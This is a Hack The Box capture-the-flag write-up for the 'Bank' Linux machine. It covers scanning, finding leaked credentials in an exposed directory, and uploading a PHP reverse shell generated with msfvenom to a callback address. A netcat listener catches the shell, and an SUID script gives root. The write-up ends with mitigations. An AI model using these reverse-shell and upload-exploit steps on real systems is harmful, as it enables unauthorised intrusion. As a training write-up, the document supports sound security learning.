Bank is an easy difficulty Linux box. The IP address is
The first step as with most other boxes is to run nmap on the box.
1 nmap -sC -sV -oA nmap/nmap 10.10.10.29
The flags used here are
-sc runs nmap using default scripts
-sv Does a version scan.
-oa nmap/nmap Saves the scan output in a folder named nmap
1 2 3 4 5 6 7 8 9 10 11 12 13 14 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA) | 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA) | 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA) |_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519) 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looking at the HTTP port first shows an Apache web server start page. Given the box is running a DNS server. It’s safe to assume there must be some virtual hosts. To enable a connection to this box a DNS entry must be added to our local hosts file.
1 echo "10.10.10.29 bank.htb" | sudo tee -a /etc/host
http://bank.htb opens up to a login page. There’s no obvious method to exploit the login form so there must be some other method of entry.
Running a dirbuster scan to find directories and files on the server revealed a directory named
balance-transfer. Within this folder there are several files ending in
.acc which contain plaintext encrypted bank account credentials with no obvious hash to decrypt.
Sifting through the files leads to one file which is significantly smaller than the others in the directory.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc --ERR ENCRYPT FAILED +=================+ | HTB Bank Report | +=================+ ===UserAccount=== Full Name: Christos Christopoulos Email: firstname.lastname@example.org Password: !##HTBB4nkP4ssw0rd!## CreditCards: 5 Transactions: 39 Balance: 8842803 . ===UserAccount===
The encryption failed for this particular transaction which leaves valid login credentials exposed.
Using the credentials we are able to login to the customers bank account. The authorised page shows typical banking transaction and account details. Only two page links exist. Support and Logout.
The support page shows a support ticket system for users to submit questions to the bank. The form supports a user file upload.
Viewing the source code of this page reveals the method of gaining entry to the system.
PHP Reverse Shell
To gain access to the system we need to create a PHP revers shell. There are several scripts available for use in kali Linux. MSF Venom can be used to make a quick payload file if no scripts are available.
1 msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.17 LPORT=4455 -f raw > shell.htb
After uploading the file to the support page we need to open a listener to establish the connection by using a netcat listener on our attack machine with
nc -nvlp 4455. Once the listener is running, navigating to the uploaded file in a browser
http://bank.htb/uploads/shell.htb will enable a remote shell on the system as the
Traversing the file system reveals that the
www-data user has access to the home directory of the user
chris where the
user.txt file can be located.
Running LinEnum.sh on the server revelealed a file with an SUID bit.
Running this file reveals a script designed to give root privileges to the curret user for “emergency” reasons.
A root shell is immediately granted running the
emergency script and the
root.txt file is in the root folder.
There are several steps that could have been taken to mitigate the security flaws on this system.
- Account details should be moved to a location on the server not accessible by the web server.
- Turning off Directory listings in the Apache web server would prevent the files from being browsed.
- Ensuring that data cannot be processed without valid encryption.
- Removing Debug information from customer facing websites.
- Not allowing users the ability upload files that can execute server side code.
- Disabling PHP execute, passthru and shell functions.
- The Apache web server should run as its own user with no access to other system users files or data.
- Having a script that enables root login to be accessible by users without permission should be avoided.